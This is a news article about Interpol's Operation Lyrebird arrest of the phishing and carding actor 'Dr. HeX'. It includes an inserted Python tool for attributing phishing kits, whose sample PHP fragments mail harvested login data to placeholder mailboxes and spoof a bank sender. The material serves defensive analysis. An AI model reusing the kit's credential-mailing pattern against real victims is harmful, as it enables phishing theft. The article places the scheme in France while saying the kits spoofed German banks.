Law enforcement authorities have apprehended an alleged threat actor behind a phishing and credit card fraud scheme aimed at telecom and multinational corporations in France, one that targeted thousands of unwitting victims over several years. Interpol and partner law enforcement agencies have finally arrested the culprit, a Moroccan national.
A two-year Interpol investigation, codenamed Operation Lyrebird, led to the arrest of Dr. HeX, a Moroccan national. The information was disclosed today by cybersecurity firm Group-IB in a report.
The cybersecurity firm said:
Dr. HeX is said to have been “active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims.”
The attacks were conducted using a phishing kit composed of rogue banking websites that spoofed German banks, followed by mass emails, sent through the rogue websites, that asked recipients for their login details. When unsuspecting victims entered their username and password on the fake web page, their credentials were forwarded to the perpetrator’s email account. Group-IB said it recovered three different phishing kits, all presumably created by the threat actor.
Interpol said in a statement:
“The phishing kits were also sold to other individuals through online forums to allow them to facilitate similar malicious campaigns against victims. These were then used to impersonate online banking facilities, allowing the suspect and others to steal sensitive information and defraud trusting individuals for financial gain, with the losses of individuals and companies published online in order to advertise these malicious services.”
Scripts included in the phishing kit contained the name Dr. HeX and the individual’s email address, which allowed Group-IB to deanonymize the cybercriminal and discover a YouTube channel and another name used to register two fraudulent domains.
Furthermore, Group-IB said it was also able to map the email address to malicious infrastructure deployed by the accused in multiple phishing campaigns through five emails, six nicknames, and Skype, Facebook, Instagram, and YouTube accounts.
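The attribution described above rests on artefacts that kit authors leave behind: the address the kit mails harvested credentials to, and the handle the author signs the source with. The following is an added example, not Group-IB's tooling or any of the kit files from the investigation, of how an analyst can extract those artefacts from recovered kit sources and see which ones recur across kits. The sample PHP fragments, file paths, handle and email addresses are all constructed placeholders; the resolution of `mail()`'s first argument through simple `$var = "..."` assignments is an assumption that covers common kit layouts, not every obfuscated one.

```python
import re

# Constructed sample: fragments of the kind a recovered phishing kit might contain.
# These are NOT the real kit files from the investigation; the handle and
# every address below are placeholders chosen for this example.
SAMPLE_KITS = {
    "kit_a/login.php": """<?php
// Coded by Dr.Example
$to = "operator@example.invalid";
$msg = "login page hit";
mail($to, "Rezult", $msg);
""",
    "kit_a/next.php": """<?php
mail("operator@example.invalid", "Rezult 2", $msg);
""",
    "kit_b/index.php": """<?php
/* (c) Dr.Example 2017 */
$recipient = 'second-box@example.invalid';
mail($recipient, "Info", $body, "From: noreply@bank-spoof.example");
""",
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Author signatures commonly found in kit comments ("Coded by X", "(c) X").
HANDLE_RE = re.compile(r"(?:coded by|made by|\(c\))\s*([A-Za-z0-9._-]{3,})", re.IGNORECASE)
# First argument of PHP mail(): either a string literal or a variable.
MAIL_CALL_RE = re.compile(r"\bmail\s*\(\s*([^,]+?)\s*,", re.IGNORECASE)
# Simple string assignments, used to resolve a variable passed to mail().
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*['\"]([^'\"]+)['\"]")


def exfil_addresses(src):
    """Return the recipient addresses of every mail() call in one kit file.

    Assumption: recipients are either quoted literals or variables assigned
    a quoted literal elsewhere in the same file.
    """
    assigns = dict(ASSIGN_RE.findall(src))
    found = []
    for arg in MAIL_CALL_RE.findall(src):
        arg = arg.strip()
        value = assigns.get(arg, arg) if arg.startswith("$") else arg.strip("'\"")
        found.extend(email.lower() for email in EMAIL_RE.findall(value))
    return found


def profile_kits(kits):
    """Build a per-kit report: exfil addresses, author handles, other addresses."""
    report = {}
    for path, src in kits.items():
        kit = path.split("/", 1)[0]
        entry = report.setdefault(kit, {"exfil": set(), "handles": set(), "other_emails": set()})
        exfil = exfil_addresses(src)
        entry["exfil"].update(exfil)
        entry["handles"].update(HANDLE_RE.findall(src))
        # Addresses that appear but are not exfil recipients (e.g. a spoofed From header).
        entry["other_emails"].update(
            e.lower() for e in EMAIL_RE.findall(src) if e.lower() not in exfil
        )
    return report


def shared_artefacts(report):
    """Artefacts seen in more than one kit: the basis for linking kits to one operator."""
    counts = {}
    for entry in report.values():
        for key in ("exfil", "handles"):
            for item in entry[key]:
                counts[(key, item)] = counts.get((key, item), 0) + 1
    return sorted(k for k, n in counts.items() if n > 1)


if __name__ == "__main__":
    rep = profile_kits(SAMPLE_KITS)
    for kit, entry in rep.items():
        print(kit, {k: sorted(v) for k, v in entry.items()})
    print("shared across kits:", shared_artefacts(rep))
```

On the constructed sample the two kits use different exfil mailboxes but carry the same author handle, which is exactly the kind of overlap that lets an investigator treat separate kits as one actor's work and then pivot from the handle and mailbox to accounts elsewhere. Against real kits the regexes should be treated as a first pass: obfuscated or dynamically built recipient strings need manual review.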
The digital footprint of Dr. HeX left a telltale trail of malign activity spanning 2009 to 2018. During this period the threat actor defaced at least 134 websites and was active on underground malware trade forums, and evidence suggests he was involved in attacks on French corporations to steal financial information.
Group-IB CTO Dmitry Volkov said:
“The suspect, in particular, promoted the so-called Zombi Bot, which allegedly contained 814 exploits, including 72 private ones, a brute-forcer, web shell, and backdoor scanners, as well as functionality to carry out DDoS attacks.”